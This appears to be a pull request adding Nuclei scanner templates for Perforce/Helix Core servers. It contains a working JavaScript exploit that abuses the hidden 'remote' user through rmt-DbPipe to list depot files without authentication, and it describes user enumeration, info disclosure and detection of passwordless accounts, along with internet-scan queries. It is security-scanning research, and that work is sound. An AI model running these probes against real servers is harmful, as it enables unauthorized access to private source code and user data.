     cvss-score: 7.5
     cwe-id: CWE-306
-    cpe: |
-         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:* versions up to (excluding) 2025.1
-         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:* versions up to (excluding) 2025.1
+    cpe: cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*:*
   metadata:
-    max-requests: 3
+    verified: true
+    max-request: 3
     vendor: perforce
-    product: P4 (FKA "Helix Core", FKA "Perforce")
+    product: helix_core
+    shodan-query: port:1666 "P4D"
     fofa-query: port="1666" && protocol="unknown"
-  tags: perforce,helixcore,scm,unauth,rpc,default-login
+  tags: perforce,helixcore,scm,unauth,rpc,info-disclosure
 
 flow: tcp(1) && javascript(1)
 
-### Hex Bytes Decoded
-# Packet 1: Protocol Handshake
-# ----------------------------
-# cmpfile       : ""
-# altSync       : ""
-# client        : "97"
-# api           : "99999"
-# enableStreams : ""
-# enableGraph   : ""
-# expandAndmaps : ""
-# chunking      : ""
-# host          : "localhost"
-# port          : "192.168.0.101:1666" # Ignored by server
-# sndbuf        : "1969919"
-# rcvbuf        : "98304"
-# autoTune      : "1"
-# func          : "protocol"
-
-# Packet 2: Command (user-info)
-# -----------------------------
-# version       : "2024.2/LINUX26X86_64/2697822"
-# autoLogin     : ""
-# prog          : "p4"
-# client        : "localhost"
-# cwd           : "/tmp"
-# host          : "localhost"
-# os            : "UNIX"
-# locale        : "C"
-# user          : "user"
-# unicode       : ""
-# charset       : "1"
-# utf8bom       : "1"
-# clientCase    : "0"
-# func          : "user-info"
-
-
 tcp:
   - host:
-      - "{{Host}}:1666" # default port
+      - "{{Host}}:1666"
     inputs:
       - type: hex
         data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
@@ -86,7 +47,6 @@ javascript:
   - code: |
       var net = require("nuclei/net");
 
-      // --- HEX HELPERS ---
       function strToHex(str) {
           var hex = "";
           for (var i = 0; i < str.length; i++) {
@@ -105,13 +65,10 @@ javascript:
           }).join("");
       }
 
-      // Standard Pack Param (String Value)
       function packParamHex(name, value) {
           return strToHex(name) + "00" + numToHexLE(value.length) + strToHex(value) + "00";
       }
 
-      // Binary Pack Param (Hex Value)
-      // Used for passing pre-constructed binary payloads like keyVal
       function packParamHexFromHex(name, valueHex) {
           var len = valueHex.length / 2;
           return strToHex(name) + "00" + numToHexLE(len) + valueHex + "00";
@@ -121,7 +78,6 @@ javascript:
           var payloadHex = "";
           for (var i = 0; i < params.length; i++) {
               var p = params[i];
-              // If 3rd arg is true, value is already HEX
               if (p.length === 3 && p[2] === true) {
                    payloadHex += packParamHexFromHex(p[0], p[1]);
               } else {
@@ -135,13 +91,9 @@ javascript:
           var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(b) {
               var s = b.toString(16); return (s.length < 2 ? "0" + s : s);
           }).join("");
-
           return headerHex + payloadHex;
       }
 
-      // --- PARSERS ---
-
-      // Parses raw response into Key-Value pairs
       function parsePerforceResponse(dataStr) {
           var offset = 0;
           var results = [];
@@ -182,12 +134,10 @@ javascript:
           return results;
       }
 
-      // Decodes the binary 'data' blob from db.rev table
       function decodeDbRev(bufferStr) {
           var offset = 0;
           var records = [];
 
-          // Internal helper to read uint32
           function readUInt32() {
               if (offset + 4 > bufferStr.length) return -1;
               var v = bufferStr.charCodeAt(offset) |
@@ -198,7 +148,6 @@ javascript:
               return v >>> 0;
           }
 
-          // Internal helper to read string
           function readString() {
               var len = readUInt32();
               if (len === -1 || offset + len > bufferStr.length) return null;
@@ -218,7 +167,6 @@ javascript:
               var date = readUInt32();
               var modTime = readUInt32();
 
-              // Digest (16 bytes) + Size (8 bytes) + Trait (4) + Unknown (4) = 32 bytes
               if (offset + 32 > bufferStr.length) break;
               offset += 32;
 
@@ -237,20 +185,12 @@ javascript:
           return records;
       }
 
-      // --- LOGIC: Try Remote Access ---
       function accessRemote(host, port, useUnicode) {
           var address = host + ":" + port;
 
-          // 1. Construct keyVal Hex Buffer (42 bytes)
-          // 0-3: 02 00 00 00 (Int 2)
-          // 4-5: 2f 2f (//)
-          // 6-9: ff ff ff 7f (Int Max 2147483647)
-          // 10-41: Zeroes
           var keyValHex = "02000000" + "2f2f" + "ffffff7f";
-          // Add 32 bytes of zeroes (64 hex chars)
           for (var k = 0; k < 32; k++) keyValHex += "00";
 
-          // Packet 1: Protocol Handshake for server to server communication
           var p1 = [
               ["serverID", ""],
               ["cmdIdent", "4139E823 20EDF233 3D743292 62DFA422"],
@@ -261,9 +201,8 @@ javascript:
               ["func", "protocol"]
           ];
 
-          // Packet 2: rmt-DbPipe Command
           var p2 = [
-              ["keyVal", keyValHex, true], // true indicates value is already HEX
+              ["keyVal", keyValHex, true],
               ["os", "UNIX"],
               ["cwd", ""],
               ["client", ""],
@@ -292,7 +231,6 @@ javascript:
               conn.SendHex(payloadHex);
               conn.SetTimeout(5);
 
-              // Read Loop
               for (var loop = 0; loop < 20; loop++) {
                   try {
                       var bytes = conn.Recv(4096);
@@ -312,13 +250,11 @@ javascript:
               conn.Close();
           } catch (e) { return []; }
 
-          // Parse & Extract
           var packets = parsePerforceResponse(rawBuffer);
           var extractedFiles = [];
 
           for (var i = 0; i < packets.length; i++) {
               var pkt = packets[i];
-              // Check for DB Pipe response with data
               if (pkt['func'] === 'dmr-DbPipe' && pkt['data']) {
                   var records = decodeDbRev(pkt['data']);
                   for (var r = 0; r < records.length; r++) {
@@ -329,11 +265,8 @@ javascript:
           return extractedFiles;
       }
 
-      // --- EXECUTION ---
-      // 1. Try ASCII
       var files = accessRemote(Host, Port, false);
 
-      // 2. If empty, try Unicode
       if (files.length === 0) {
           files = accessRemote(Host, Port, true);
       }
@@ -343,6 +276,13 @@ javascript:
     args:
       Host: "{{Host}}"
       Port: "1666"
+
+    matchers:
+      - type: word
+        words:
+          - '"depotFile":'
+          - '"change":'
+        condition: and
 
     extractors:
       - type: json

--- a/network/detection/perforce-detect.yaml
+++ b/network/detection/perforce-detect.yaml
@@ -5,7 +5,7 @@ info:
   author: Morgan Robertson
   severity: info
   description: |
-    This template detects perforce servers. It works by emulating the binary handshake of a "./p4 info" command and looking for keywords in the response. 
+    This template detects perforce servers. It works by emulating the binary handshake of a "./p4 info" command and looking for keywords in the response.
   reference:
     - https://morganrobertson.net/p4wned/
     - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
@@ -17,7 +17,7 @@ info:
   metadata:
     vendor: perforce
     product: P4 (FKA "Helix Core", FKA "Perforce")
-    fofa-query: \"add SSL protocol prefix to P4PORT\" && protocol=\"unknown\" # Only finds SSL enabled instances 
+    fofa-query: \"add SSL protocol prefix to P4PORT\" && protocol=\"unknown\" # Only finds SSL enabled instances
   tags: perforce,helixcore,scm,detection,p4d
 
 ### Hex Bytes Decoded
@@ -72,4 +72,3 @@ tcp:
           - "xfiles"
           - "server"
         condition: and
-

--- a/network/detection/perforce-detect.yaml
+++ b/network/detection/perforce-detect.yaml
@@ -18,7 +18,7 @@ info:
     vendor: perforce
     product: P4 (FKA "Helix Core", FKA "Perforce")
     fofa-query: \"add SSL protocol prefix to P4PORT\" && protocol=\"unknown\" # Only finds SSL enabled instances 
-  tags: perforce,helixcore,scm,detection
+  tags: perforce,helixcore,scm,detection,p4d
 
 ### Hex Bytes Decoded
 # Packet 1: Protocol Handshake
@@ -69,7 +69,7 @@ tcp:
         part: data
         encoding: hex
         words:
-          - "xfiles" # xfiles
-          - "server" # server
+          - "xfiles"
+          - "server"
         condition: and
 

--- a/network/detection/perforce-detect.yaml
+++ b/network/detection/perforce-detect.yaml
@@ -1,69 +1,37 @@
 id: perforce-detection
 
 info:
-  name: Perforce Server Detection
+  name: Perforce Server - Detection
   author: Morgan Robertson
   severity: info
   description: |
-    This template detects perforce servers. It works by emulating the binary handshake of a "./p4 info" command and looking for keywords in the response.
+    Detecetd Perforce server was identified by emulating the binary handshake of a "p4 info" command and matching server-side keywords in the response.
   reference:
     - https://morganrobertson.net/p4wned/
     - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
     - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
   classification:
-    cpe: |
-         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
-         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+    cpe: cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*:*
   metadata:
+    verified: true
+    max-request: 2
     vendor: perforce
-    product: P4 (FKA "Helix Core", FKA "Perforce")
-    fofa-query: \"add SSL protocol prefix to P4PORT\" && protocol=\"unknown\" # Only finds SSL enabled instances
-  tags: perforce,helixcore,scm,detection,p4d
-
-### Hex Bytes Decoded
-# Packet 1: Protocol Handshake
-# ----------------------------
-# cmpfile       : ""
-# altSync       : ""
-# client        : "97"
-# api           : "99999"
-# enableStreams : ""
-# enableGraph   : ""
-# expandAndmaps : ""
-# chunking      : ""
-# host          : "localhost"
-# port          : "192.168.0.101:1666"
-# sndbuf        : "1969919"
-# rcvbuf        : "98304"
-# autoTune      : "1"
-# func          : "protocol"
-
-# Packet 2: Command (user-info)
-# -----------------------------
-# version       : "2024.2/LINUX26X86_64/2697822"
-# autoLogin     : ""
-# prog          : "p4"
-# client        : "localhost"
-# cwd           : "/tmp"
-# host          : "localhost"
-# os            : "UNIX"
-# locale        : "C"
-# user          : "user"
-# unicode       : ""
-# charset       : "1"
-# utf8bom       : "1"
-# clientCase    : "0"
-# func          : "user-info"
-
+    product: helix_core
+    shodan-query: port:1666 "P4D"
+    fofa-query: port="1666" && protocol="unknown"
+  tags: perforce,helixcore,scm,detect,p4d
 
 tcp:
   - host:
       - "{{Host}}:{{Port}}"
-      - "{{Host}}:1666" # default port
+      - "{{Host}}:1666"
+
     inputs:
       - type: hex
         data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
+
     read-size: 4096
+    stop-at-first-match: true
     matchers:
       - type: word
         part: data

--- a/network/detection/perforce-detect.yaml
+++ b/network/detection/perforce-detect.yaml
@@ -1,0 +1,75 @@
+id: perforce-detection
+
+info:
+  name: Perforce Server Detection
+  author: Morgan Robertson
+  severity: info
+  description: |
+    This template detects perforce servers. It works by emulating the binary handshake of a "./p4 info" command and looking for keywords in the response. 
+  reference:
+    - https://morganrobertson.net/p4wned/
+    - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
+    - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
+  classification:
+    cpe: |
+         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
+         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+  metadata:
+    vendor: perforce
+    product: P4 (FKA "Helix Core", FKA "Perforce")
+    fofa-query: \"add SSL protocol prefix to P4PORT\" && protocol=\"unknown\" # Only finds SSL enabled instances 
+  tags: perforce,helixcore,scm,detection
+
+### Hex Bytes Decoded
+# Packet 1: Protocol Handshake
+# ----------------------------
+# cmpfile       : ""
+# altSync       : ""
+# client        : "97"
+# api           : "99999"
+# enableStreams : ""
+# enableGraph   : ""
+# expandAndmaps : ""
+# chunking      : ""
+# host          : "localhost"
+# port          : "192.168.0.101:1666"
+# sndbuf        : "1969919"
+# rcvbuf        : "98304"
+# autoTune      : "1"
+# func          : "protocol"
+
+# Packet 2: Command (user-info)
+# -----------------------------
+# version       : "2024.2/LINUX26X86_64/2697822"
+# autoLogin     : ""
+# prog          : "p4"
+# client        : "localhost"
+# cwd           : "/tmp"
+# host          : "localhost"
+# os            : "UNIX"
+# locale        : "C"
+# user          : "user"
+# unicode       : ""
+# charset       : "1"
+# utf8bom       : "1"
+# clientCase    : "0"
+# func          : "user-info"
+
+
+tcp:
+  - host:
+      - "{{Host}}:{{Port}}"
+      - "{{Host}}:1666" # default port
+    inputs:
+      - type: hex
+        data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
+    read-size: 4096
+    matchers:
+      - type: word
+        part: data
+        encoding: hex
+        words:
+          - "xfiles" # xfiles
+          - "server" # server
+        condition: and
+


### PR DESCRIPTION
Adding five nuclei templates targeting Perforce (Helix Core) servers. Perforce is a source code management (SCM) system widely used in gaming, defence, automotive, and enterprise environments. It speaks a custom binary TCP protocol (default port 1666) and ships with a number of insecure defaults that are exploitable without credentials.

Full research article: https://morganrobertson.net/p4wned/

**Templates submitted:**

1. `perforce-detect.yaml`: Server detection/fingerprinting (existing template, updated metadata)
2. `perforce-user-extraction.yaml`: Unauthenticated user enumeration
3. `perforce-info-disclosure.yaml`: Unauthenticated server info disclosure
4. `perforce-passwordless-users.yaml`: Detection of accounts with no password set
5. `perforce-remote-depot-unauth.yaml`: Unauthenticated remote depot file enumeration

---

## Template Validation

- [x] Validated with hosts running vulnerable configurations (True Positive): see output below and live test servers
- [x] Validated with hosts running hardened configurations (avoid False Positive)

---

## Technical Notes

### Protocol

Perforce uses a proprietary binary TCP protocol. These templates emulate it using Nuclei's JavaScript engine. Each template uses `flow: tcp(1) && javascript(1)`: the TCP step sends a binary Perforce handshake and checks the response for Perforce-specific strings (`xfiles`, `server`) to confirm the target before the JavaScript payload runs. This prevents the JS code from firing against non-Perforce targets.

### ASCII vs Unicode Servers

Perforce servers run in either ASCII or unicode mode. The two modes are wire-incompatible for certain commands. All templates in this PR handle both automatically: ASCII mode is tried first; if the server returns the unicode error (`"Unicode server permits only unicode enabled clients"`) the connection is retried with the `unicode` parameter set. This is reliable because unicode servers always return a structured error to ASCII clients, making it a clean detection signal.

### SSL Limitation

Nuclei's JavaScript TCP engine (`nuclei/net`) does not support TLS. These templates therefore **do not work against SSL-enabled Perforce servers** (prefix `ssl:` in P4PORT). This is a known limitation. I have working Node.js scripts that handle SSL auto-detection (included in the research repo) but could not replicate this inside Nuclei's JS sandbox.

The TCP gate step will still fire against SSL servers if the Perforce service responds to the initial binary probe on the same port (some configurations do). If SSL is strictly enforced, the TCP gate returns no match and the JavaScript step never runs.

### Port Limitation

The TCP gate step hardcodes port `1666` (default). Nuclei's JavaScript engine cannot receive the `Port` variable:

```
could not compile request: cause="'Port' variable cannot contain any dsl expressions"
```

Non-default ports can be scanned by passing them in the target (`-u host:port`): the JavaScript step constructs its own connection using the `Host` and `Port` args and these do resolve correctly. Only the TCP gate is limited to 1666.

### Affected Versions

| Template | Affected Versions | Fixed In |
|---|---|---|
| `perforce-user-extraction` | All versions (default `run.users.authorize=0`) | N/A: requires configuration change |
| `perforce-info-disclosure` | All versions (default `dm.info.hide=0`) | N/A: requires configuration change |
| `perforce-passwordless-users` | All versions | N/A: requires password enforcement |
| `perforce-remote` | All versions below 2025.1 with `security < 4` | Fixed by default in 2025.1+ |

---

## Live Test Servers

N.B. I'm able to provide separate instructions if nuclei maintainers want to set up their own server for testing.

The following servers are intentionally vulnerable for testing by nuclei maintainers.

| Server | Type | Notes |
|---|---|---|
| `p4testascii.morganrobertson.net:1666` | ASCII, plain TCP | User enum, info, remote depot |
| `p4testunicode.morganrobertson.net:1666` | Unicode, plain TCP | User enum (unicode path), includes a passwordless user |
| `p4testunicode.morganrobertson.net:1667` | Unicode, SSL | User enum (unicode path), include a passwordless user |


---

## Template Output (Live Servers)

### perforce-detect.yaml

```
$ nuclei -t perforce-detect.yaml -u p4testascii.morganrobertson.net:1666

[perforce-detection] [tcp] [info] p4testascii.morganrobertson.net:1666

Scan completed in 472ms. 1 matches found.
```

---

### perforce-user-extraction.yaml

The universal template automatically handles both ASCII and unicode servers.

```
$ nuclei -t perforce-user-extraction.yaml -u p4testascii.morganrobertson.net:1666

[perforce-user-enumeration:users]      [javascript] [medium] p4testascii.morganrobertson.net:1666 ["abob","admin","jdoe"]
[perforce-user-enumeration:emails]     [javascript] [medium] p4testascii.morganrobertson.net:1666 ["abob@fake.com","admin@fake.com","jdoe@example.com"]
[perforce-user-enumeration:full_names] [javascript] [medium] p4testascii.morganrobertson.net:1666 ["Alice Bob","admin","Jane Doe"]

Scan completed in 924ms. 3 matches found.


$ nuclei -t perforce-user-extraction.yaml -u p4testunicode.morganrobertson.net:1666

[perforce-user-enumeration:users]      [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["abob","admin","jdoe","passwordless"]
[perforce-user-enumeration:emails]     [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["abob@fake.com","admin@fake.com","jdoe@example.com","passwordless@example"]
[perforce-user-enumeration:full_names] [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["Alice Bob","admin","Jane Doe","passwordless"]

Scan completed in 1.1s. 3 matches found.
```

**Negative test**: after setting `run.users.authorize=1` on the ASCII server:

```
$ nuclei -t perforce-user-extraction.yaml -u p4testascii.morganrobertson.net:1666

Scan completed in 1.0s. 0 matches found.
```

---

### perforce-info-disclosure.yaml

```
$ nuclei -t perforce-info-disclosure.yaml -u p4testascii.morganrobertson.net:1666

[perforce-info-disclosure:version]     [javascript] [medium] p4testascii.morganrobertson.net:1666 ["P4D/LINUX26X86_64/2024.2/2877946"]
[perforce-info-disclosure:server_root] [javascript] [medium] p4testascii.morganrobertson.net:1666 ["/opt/p4_nuclei_test/p4root_ascii"]
[perforce-info-disclosure:server_addr] [javascript] [medium] p4testascii.morganrobertson.net:1666 ["perforce-server:1666"]
[perforce-info-disclosure:license]     [javascript] [medium] p4testascii.morganrobertson.net:1666 ["none"]

Scan completed in 742ms. 4 matches found.


$ nuclei -t perforce-info-disclosure.yaml -u p4testunicode.morganrobertson.net:1666

[perforce-info-disclosure:version]     [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["P4D/LINUX26X86_64/2024.2/2877946"]
[perforce-info-disclosure:server_root] [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["/opt/p4_nuclei_test/p4root_unicode"]
[perforce-info-disclosure:server_addr] [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["perforce-server-unicode:1666"]
[perforce-info-disclosure:license]     [javascript] [medium] p4testunicode.morganrobertson.net:1666 ["none"]

Scan completed in 783ms. 4 matches found.
```

Note: `server_root` reveals the filesystem path of the Perforce database on the server. `server_addr` reveals the internal hostname. On licensed servers, `license` contains the organisation name.

**Negative test**: after setting `dm.info.hide=1`:

```
$ nuclei -t perforce-info-disclosure.yaml -u p4testascii.morganrobertson.net:1666

Scan completed in 0.7s. 0 matches found.
```

---

### perforce-passwordless-users.yaml

Uses the tagged output protocol (`tag` parameter) which switches the server to `client-FstatInfo` response format. In this format, users with passwords include a `Password: "enabled"` field; the field is entirely absent for passwordless users.

```
$ nuclei -t perforce-passwordless-users.yaml -u p4testascii.morganrobertson.net:1666

Scan completed in 1.08s. 0 matches found.


$ nuclei -t perforce-passwordless-users.yaml -u p4testunicode.morganrobertson.net:1666

[perforce-passwordless-users:passwordless_users] [javascript] [critical] p4testunicode.morganrobertson.net:1666 ["passwordless"]
[perforce-passwordless-users:emails]             [javascript] [critical] p4testunicode.morganrobertson.net:1666 ["passwordless@example"]
[perforce-passwordless-users:full_names]         [javascript] [critical] p4testunicode.morganrobertson.net:1666 ["passwordless"]

Scan completed in 1.06s. 3 matches found.
```

---

### perforce-remote-depot-unauth.yaml

Exploits the hidden `remote` user via `rmt-DbPipe` (server-to-server RPC) to read the `db.rev` table directly, enumerating all files committed to the depot without authentication. Works on any server below 2025.1 with `security < 4` (default is 0).

```
$ nuclei -t perforce-remote-depot-unauth.yaml -u p4testascii.morganrobertson.net:1666

[perforce-remote-depot-access-unauth:depot_files] [javascript] [high] p4testascii.morganrobertson.net:1666 ["//depot/moresecrets.c","//depot/secret.c"]
[perforce-remote-depot-access-unauth:changes]     [javascript] [high] p4testascii.morganrobertson.net:1666 ["2","1"]

Scan completed in 745ms. 2 matches found.


$ nuclei -t perforce-remote-depot-unauth.yaml -u p4testunicode.morganrobertson.net:1666

[perforce-remote-depot-access-unauth:depot_files] [javascript] [high] p4testunicode.morganrobertson.net:1666 ["//depot/moresecrets.c","//depot/secret.c"]
[perforce-remote-depot-access-unauth:changes]     [javascript] [high] p4testunicode.morganrobertson.net:1666 ["2","1"]

Scan completed in 1.07s. 2 matches found.
```

**Negative test**: after setting `security=4` on the ASCII server (disables the `remote` user):

```
$ nuclei -t perforce-remote-depot-unauth.yaml -u p4testascii.morganrobertson.net:1666

Scan completed in 0.7s. 0 matches found.
```

---

## FOFA Queries

```
port="1666" && protocol="unknown"
```

This is non-specific but finds most non-SSL Perforce services on the default port.

```
"add SSL protocol prefix to P4PORT" && protocol="unknown"
```

This is highly specific to SSL-enabled Perforce servers (the string comes from the error message the server sends to non-SSL clients). Note the templates do not currently support SSL.

---

## Additional References

- [Research article](https://morganrobertson.net/p4wned/)
- [My Perforce security tools](https://github.com/flyingllama87/p4wned/)
- [Perforce binary protocol reverse engineering](https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce)
- [Perforce release notes (2025.1 fix)](https://help.perforce.com/helix-core/release-notes/current/relnotes.txt)
